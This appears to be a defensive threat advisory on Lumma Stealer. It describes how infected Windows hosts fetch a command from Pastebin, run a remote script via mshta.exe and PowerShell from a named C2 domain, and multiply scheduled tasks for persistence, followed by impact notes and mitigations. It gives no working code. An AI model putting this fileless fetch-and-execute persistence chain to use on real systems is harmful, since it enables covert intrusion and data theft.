The Lumma Stealer malware has been observed engaging in a distinctive post-infection behavior pattern involving the repeated creation of scheduled tasks on infected Windows hosts. After initial data exfiltration, the infected system retrieves a PowerShell command from a Pastebin raw URL, which downloads and executes a script from a .cc domain (fileless-market.cc) using mshta.exe. This script execution triggers the creation of multiple scheduled tasks, each configured to run the same mshta command targeting the C2 server. Over time, the number of scheduled tasks increases significantly (e.g., 31 tasks after 11 hours), all performing identical actions, thereby generating persistent and increasing HTTPS traffic to the same C2 domain. This behavior is unusual and has not been previously documented by SANS ISC handlers. The infection chain involves fileless techniques leveraging PowerShell and mshta, which complicates detection and removal. The scheduled tasks provide persistence and ensure continuous communication with the attacker-controlled C2 infrastructure. The infection's reliance on Pastebin for initial command retrieval and the use of .cc domains for C2 traffic indicate a multi-stage infection process. Although no known exploits have been reported, the infection's persistence and data exfiltration capabilities pose a medium severity threat. The infection primarily affects Windows hosts and exploits native Windows tools for stealth and persistence.

For European organizations, this threat can lead to prolonged unauthorized access and data exfiltration due to the persistent scheduled tasks that maintain continuous C2 communication. The repeated creation of scheduled tasks can degrade system performance and increase network traffic, potentially triggering network congestion or detection alerts. The use of legitimate Windows utilities (mshta and PowerShell) for malicious purposes complicates detection and remediation efforts, increasing the risk of prolonged compromise. Sensitive data could be continuously siphoned off, impacting confidentiality. The persistence mechanism also increases the difficulty of fully eradicating the infection, raising the risk of lateral movement within networks. Organizations in critical infrastructure, finance, healthcare, and government sectors could face significant operational and reputational damage if infected. The infection's stealthy nature may delay incident response, allowing attackers to maintain footholds and expand their access.

1. Implement monitoring and alerting for unusual scheduled task creation patterns, especially multiple tasks with identical triggers and actions involving mshta.exe or PowerShell commands. 2. Restrict or block outbound traffic to suspicious domains such as fileless-market.cc and Pastebin raw URLs used for command retrieval at network perimeter firewalls and DNS filtering solutions. 3. Apply application control policies to restrict or block mshta.exe and PowerShell usage to only approved scripts and commands, leveraging Windows Defender Application Control or similar tools. 4. Conduct thorough endpoint detection and response (EDR) investigations to identify and remove all scheduled tasks related to this infection and any associated persistence mechanisms. 5. Educate security teams to recognize fileless infection patterns and unusual scheduled task behaviors. 6. Regularly update and patch Windows systems to reduce the attack surface, although this infection leverages legitimate tools rather than software vulnerabilities. 7. Employ network traffic analysis to detect abnormal HTTPS session volumes to uncommon domains. 8. Use threat intelligence feeds to update blocklists and detection signatures related to Lumma Stealer and associated infrastructure.